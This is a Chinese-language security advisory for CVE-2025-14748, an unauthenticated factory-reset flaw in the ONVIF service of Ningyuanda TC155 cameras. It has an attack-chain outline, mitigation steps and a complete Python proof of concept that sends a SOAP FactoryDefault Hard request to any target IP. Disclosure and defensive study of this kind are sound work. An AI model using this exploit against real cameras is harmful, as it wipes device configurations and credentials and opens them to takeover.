CVE-2025-14748: Ningyuanda TC155 ONVIF设备服务未授权硬重置漏洞

漏洞信息

漏洞编号

CVE-2025-14748

漏洞类型

访问控制不当/未授权操作

CVSS评分

5.4 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ningyuanda TC155 (固件版本57.0.2.0)

漏洞概述

CVE-2025-14748是影响宁禹达（Ningyuanda）TC155摄像头设备的安全漏洞。该漏洞存在于设备的ONVIF设备管理服务中，具体位于/device_service接口。攻击者可以通过构造特定的SOAP请求，利用FactoryDefault参数（Hard值）执行未经授权的设备硬重置操作。由于漏洞无需认证即可利用，且攻击复杂度较低，任何能够访问本地网络的攻击者都可以利用此漏洞。这可能导致设备配置被重置为出厂默认值，影响设备的正常运行和数据安全性。漏洞已于2025年12月16日公开披露，厂商在收到通知后未作出任何回应。

技术细节

该漏洞源于Ningyuanda TC155设备的ONVIF设备管理服务对访问控制的实现不当。ONVIF（Open Network Video Interface Forum）是一种广泛使用的网络视频设备接口标准。设备的/device_service端点本应需要适当的认证才能执行敏感操作如恢复出厂设置，但该设备未能正确实现权限验证机制。攻击者可以通过发送包含FactoryDefault参数且值为Hard的SOAP请求来触发硬重置功能。由于设备依赖邻接网络访问（AV:A），攻击者需要处于同一网络段内。成功利用后，设备的所有配置参数将被重置为出厂默认值，包括网络设置、用户凭据等，可能导致服务中断或未授权访问风险。

攻击链分析

STEP 1

步骤1

攻击者获得与目标设备的邻接网络访问权限，位于同一网段或可通过ARP欺骗等方式进行中间人攻击

STEP 2

步骤2

攻击者识别目标设备为Ningyuanda TC155摄像头，并确认其ONVIF设备服务在/onvif/device_service端点可用

STEP 3

步骤3

攻击者构造包含FactoryDefault参数的SOAP请求，将FactoryDefaultType设置为Hard（硬重置）

STEP 4

步骤4

攻击者向设备发送未经认证的SOAP请求，由于设备未实现适当的访问控制，请求被接受并执行

STEP 5

步骤5

设备执行硬重置操作，将所有配置恢复到出厂默认状态，包括网络设置、用户账户、认证信息等

STEP 6

步骤6

攻击者可利用重置后的默认凭据或其他配置变化进行进一步攻击，导致服务中断或未授权访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14748 PoC - Ningyuanda TC155 Unauthenticated Hard Reset
# Target: Ningyuanda TC155 ONVIF Device Service
# Attack Vector: Adjacent Network (AV:A)
# Authentication: None Required (PR:N)

def exploit_hard_reset(target_ip, target_port=80):
    """
    Exploit for CVE-2025-14748
    Sends an unauthenticated SOAP request to perform factory reset (Hard)
    """
    url = f"http://{target_ip}:{target_port}/onvif/device_service"
    
    # SOAP Envelope for FactoryDefault with Hard parameter
    soap_payload = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
                xmlns:tds="http://www.onvif.org/ver10/device/wsdl">
   <soap:Header/>
   <soap:Body>
      <tds:FactoryDefault>
         <tds:FactoryDefaultType>Hard</tds:FactoryDefaultType>
      </tds:FactoryDefault>
   </soap:Body>
</soap:Envelope>"""
    
    headers = {
        'Content-Type': 'application/soap+xml',
        'SOAPAction': '"http://www.onvif.org/ver10/device/wsdl/FactoryDefault"'
    }
    
    try:
        print(f"[*] Target: {target_ip}:{target_port}")
        print(f"[*] Sending FactoryDefault (Hard) request...")
        
        response = requests.post(url, data=soap_payload, headers=headers, timeout=10)
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text[:500]}")
        
        if response.status_code == 200:
            print("[+] Factory reset command sent successfully")
            return True
        else:
            print("[-] Unexpected response")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit_hard_reset(target, port)

影响范围

Ningyuanda TC155 固件版本 57.0.2.0

防御指南

临时缓解措施

由于厂商未回应披露通知，建议采取以下临时措施：1) 将受影响的设备隔离在独立的网络分段中；2) 使用网络防火墙限制对设备ONVIF服务的访问，仅允许授权的管理IP地址访问；3) 监控设备日志，关注异常的设备重置行为；4) 评估设备是否可被替换为已修复或更安全的型号；5) 如果业务允许，考虑暂时禁用ONVIF服务或使用网络ACL限制访问来源。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14748
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14748
3 Details https://www.cvedetails.com/cve/CVE-2025-14748/
4 VulDB https://vuldb.com/cve/CVE-2025-14748
5 Link https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-Hard-Reset.md
6 Link https://vuldb.com/?ctiid.336521
7 Link https://vuldb.com/?id.336521
8 Link https://vuldb.com/?submit.707197